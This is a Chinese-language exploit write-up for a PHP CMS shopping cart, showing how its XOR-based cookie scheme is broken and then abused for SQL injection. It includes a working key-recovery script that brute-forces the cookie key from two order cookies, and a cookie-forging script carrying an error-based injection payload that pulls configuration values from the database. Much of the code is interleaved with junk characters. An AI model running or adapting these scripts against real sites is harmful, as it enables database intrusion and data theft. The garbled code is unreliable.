www.xxx.com/plus/search.php?keyword=6 B% P; O- I2 w0 d
在 include/shopcar.class.php中
先看一下这个shopcar类是如何生成cookie的
/**
 * Stores $value in a cookie named $key after running it through enCrypt().
 *
 * Array values are first flattened by enCode() (the surrounding text describes
 * this as producing an a=..&b=.. query-style string) and then enCrypt()ed;
 * scalars are enCrypt()ed directly.
 *
 * Security notes (defender view): enCrypt()/setKey() only XOR the value with
 * md5-derived keys and add no integrity check, so a client that holds a known
 * plaintext/ciphertext pair can recover the static key and forge any cart
 * cookie. The cookie is set site-wide ('/') for 36000 s, and setcookie() is
 * called without the secure/httponly arguments. Mitigation: authenticate cookie
 * values (e.g. an HMAC from hash_hmac(), verified with hash_equals()) before
 * trusting anything read back from them.
 */
function saveCookie($key, $value)
{
    if (is_array($value)) {
        // Flatten the array to a string first; enCrypt() works on bytes.
        $value = $this->enCrypt($this->enCode($value));
    } else {
        $value = $this->enCrypt($value);
    }
    // 36000 s = 10 hours; path '/' exposes the cookie to every script on the host.
    setcookie($key, $value, time() + 36000, '/');
}
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
/**
 * "Encrypts" $txt for storage in a cookie.
 *
 * A per-call key is taken as md5(rand(0, 32000)). Each plaintext byte is XORed
 * with one hex character of that key and written out *preceded by the key
 * character itself*, so the output interleaves key and ciphertext bytes. The
 * result is then passed through setKey() (XOR with the site-wide key) and
 * base64-encoded.
 *
 * Security notes (defender view): this is a two-layer XOR, not encryption, and
 * it carries no MAC. The per-call key space is at most 32001 values and the
 * cart plaintext is predictable from the page, so - as the writeup around this
 * excerpt shows - the static setKey() key can be recovered and cookies forged.
 * Seeding the PRNG from microtime() or swapping rand() for a CSPRNG would not
 * fix this; the design needs an authenticated construction.
 *
 * @param string $txt plaintext (array values are flattened by enCode() first)
 * @return string base64 of a byte string twice the length of $txt
 */
function enCrypt($txt)
{
    // Clock-derived seed; rand() is not a CSPRNG in any case.
    srand((double)microtime() * 1000000);
    // 32-character hex string with at most 32001 distinct values.
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for ($i = 0; $i < strlen($txt); $i++) {
        // Wrap the key index so the 32-char key is reused cyclically.
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // Emit the key char in the clear, then plaintext XOR key char.
        $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * XORs $txt with the site-wide cookie key, md5(strtolower($cfg_cookie_encode)).
 *
 * The same 32-character hex key is reused for every cookie, cycling over the
 * input. XOR with a reused key is reversible by anyone who knows one
 * plaintext/ciphertext pair, so this layer only obscures: it gives neither
 * confidentiality against the client nor integrity. Called from enCrypt();
 * presumably also used on the decode path, which is not shown here.
 *
 * @param string $txt bytes to transform
 * @return string same length as $txt
 */
function setKey($txt)
{
    // Site secret from the global config; lower-cased before hashing.
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for ($i = 0; $i < strlen($txt); $i++) {
        // Wrap the key index so the key is reused cyclically.
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再重新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
具体代码如下:
# U; C g! f4 A1 V- ^8 t+ H<?php& b7 W8 _* `+ ^9 i" C3 X
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
# M$ Q; {1 A" |# R" H s" o$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
/ K, I# J n$ d" ?+ X% j$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
7 O" U! Q$ e4 o- m6 kfunction reStrCode($code,$string)9 W7 t( }' a( e
{
8 d$ _1 \! H( U$code = base64_decode($code); ]" k) \2 `- N5 i
$key = “”;$ `0 Y9 t2 r" L" ^1 I
for($i=0 ; $i<32 ; $i++)
5 A" H' s" U" l: m4 A{: S- ]% m1 J3 O; _ [" q8 ~
$key .= $string[$i] ^ $code[$i];/ a; p [# C" y7 O! u
}
: Q3 ?; k5 ^: q5 \, p& H& Nreturn $key;
8 M9 {4 I- t. x: N4 |& K}# Q8 W8 U0 `5 j2 y& b A
function getKeys($cookie,$plantxt)/ k- s& [% {0 [
{
+ i; H1 W' ]" h7 z$tmp = $cookie;
4 T5 o/ L7 T& h2 U2 d0 U$results = array();% u% ~3 H1 C# _$ o
for($j=0 ; $j < 32000; $j++)
0 X; H) \) i3 i$ K3 m; g( w0 M7 g{; w7 }! D- k& S& s8 L$ s+ s
( t2 W6 b# p4 @
$txt = $plantxt;
1 h' c% v0 K2 h( K$ u2 }0 g$ctr = 0;9 r; T- x n/ ~) U' w6 `
$tmp = ”;- H+ ?$ s9 H1 Z9 ]* m# G
$encrypt_key = md5($j);5 o- \; t* v& v1 M( R
for($i =0; $i < strlen($txt); $i ++)) C- {6 k L3 C
{
4 P6 m, W* k. A+ u* I3 b* V$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;, t: k5 Y. B- ?0 v4 z- h: G, V
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
. z* a' h* z/ b* n' T& v}! r( v: x" U( \% t. k8 r4 Y) h
$string = $tmp; C! q# Z% N" i" O, ^2 N8 e% K
$code = $cookie;
8 I+ u0 ^! F/ ~- G4 D; Z$result = reStrCode($code,$string);
( M1 i+ K* I8 d. M2 D3 |0 Dif(eregi(‘^[a-z0-9]+$’,$result))
6 m* v! C/ t# e& J ?' l' v, z{
: n+ E4 q9 Y' _* Aecho $result.”\n”;7 y0 s* T% ?/ y
$results[] = $result;* M& J( R7 z5 R8 i1 H# `0 ?
}
& c# E2 `" U# f6 z! R% Y2 ?}
& X" `7 `; P' }* ^+ l7 preturn $results;
$ ` v1 x, @2 l}2 W) ]3 n. ^/ Q* @
$results1 = getKeys($cookie1,$plantxt);
- M' F; E& O- f+ m$results2 = getKeys($cookie2,$plantxt);
& J b" C9 o$ \; ?7 V) e- ~print “\n——————–real key————————–\n”;2 O; c; Q1 H6 c0 o$ L% M
foreach($results1 as $test1)- w3 X2 B3 N) @( W$ C
{
) c) b9 ^, E& G0 ?( C8 ~9 M) P7 yforeach($results2 as $test2) F; _) z2 J8 o b" h" K9 p
{
. N1 ~ l8 z# E8 @: x$ l; uif($test1 == $test2)
4 D, L8 g. X( c7 Z5 X" d: a1 b; y{) `( C' o9 M/ i8 v, N+ {! _
echo $test1.”\n”;
( @' l3 r, W! Q}. i9 R' h/ w. y4 c! Z2 q" o& v
}0 t: j6 ?2 Z# j# b# t
} T- q7 ]. `" e* m9 m& u
?>: ?2 \$ O$ T; _
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后,我们就可以构造任意购物车的cookie
接着看
' d3 m: `) I5 k: Z% h20 class MemberShops
2 O, G8 V1 V/ ^6 Z$ T; N H3 s21 {) ^ r. l. {0 d T/ S( ]5 [
22 var $OrdersId;0 T( ^/ [! ?4 J
23 var $productsId;
9 S6 A5 {8 E! W: G2 T1 I; Q24
/**
 * Loads the current order id from the "OrdersId" cookie, minting a new order
 * via MakeOrders() when the cookie is absent or empty.
 *
 * Security notes (defender view): $this->OrdersId is client-controlled. The
 * cookie is presumably decoded with the setKey()/enCrypt() scheme shown above
 * (confirm in getCookie()), which is forgeable, and the quoted
 * plus/carbuyaction.php excerpt interpolates this value straight into an SQL
 * string. Treat it as untrusted: validate its format here, or bind it as a
 * query parameter at the point of use.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    // empty() also rejects "0"; a fresh order id is created in that case.
    if (empty($this->OrdersId)) {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现OrderId是从cookie里面获取的
然后
/plus/carbuyaction.php中的
// The order id comes back from the client's "OrdersId" cookie in
// MemberShops::__construct(); it is attacker-controlled, not server state.
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // the order id recorded for this request
……
// $OrdersId is interpolated directly into the SQL string. Nothing in the quoted
// excerpt validates or escapes it, and it originates from a forgeable cookie,
// so this is an SQL injection point. Bind it as a query parameter (or at least
// validate it against the expected order-id format) before it reaches the query.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
接着我们就可以注入了
通过利用下面代码生成cookie:
<?php8 F3 S7 t" J8 u" I0 V
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
* B$ p3 Y9 N, [- k$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
0 }; T, _: [( a* {function setKey($txt)
7 x; X- t+ c) B% }) f; r, L{
" n6 } V/ d) y& J# e* {$ Aglobal $encrypt_key;
& d( w$ I# S Q$ctr = 0;
* b7 D" |5 L1 t& W$tmp = ”;
. p( V( S+ {8 L, [$ H7 K- Ufor($i = 0; $i < strlen($txt); $i++)
& W0 m8 E; X/ W{
& D; L7 F: ~* ?$ ~6 r% d3 C% G$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;# P- i: g- x1 W0 P3 h, k. |0 y
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];' | q% v0 t( f+ y! K1 H2 n+ g9 q
}
! m4 {0 O& o1 Preturn $tmp;
% q. `: k8 }4 v$ C}
3 {6 h) @: W0 f; O% o/ Efunction enCrypt($txt)& B( J5 k8 a8 W6 s5 z
{( D( W5 Z+ [* f6 z
srand((double)microtime() * 1000000);
+ E: s A( z0 F. l- @, R! {$encrypt_key = md5(rand(0, 32000));
2 u9 K- e; G! B+ U- v3 V$ctr = 0;
* l7 I" A2 w( C0 ]2 W9 Q1 T2 q. ]2 C3 t$tmp = ”;, E: w2 }+ a/ _% g& Q4 g( [
for($i = 0; $i < strlen($txt); $i++)
) J9 [$ W6 {& l: l% z{
) L( O, P' ^3 |$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
9 G _$ m* @0 `# l" C0 H$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
2 W0 v3 q2 z; v, C}6 f7 D! L4 n; Y3 s: g& R
return base64_encode(setKey($tmp));& S9 e0 F7 N: e2 L/ I5 K5 d/ _8 s
}
6 ?% U5 C- _( G) W i# \* pfor($dest =0;$dest = enCrypt($txt);)# E: }4 E; B% V) L; l
{
/ O! p& J+ z- _) }) P1 X. Y Rif(!strpos($dest,’+'))
! F. P& N0 \' n6 L{
' |( C! j% t' O: c+ [: O/ ~break;) @, y+ K; A1 N$ c
}
) D; b- x C7 f: f( P) @2 x$ M2 T}
4 Z C8 O5 [/ ~1 l1 K9 N$ X; Becho $dest.”\n”;; G2 G6 Z E6 G: N9 j9 _
?>4 ^6 X. M5 e4 D0 ]0 U1 [& h( Z7 W
& \* I, a( c. O7 L' J7 e |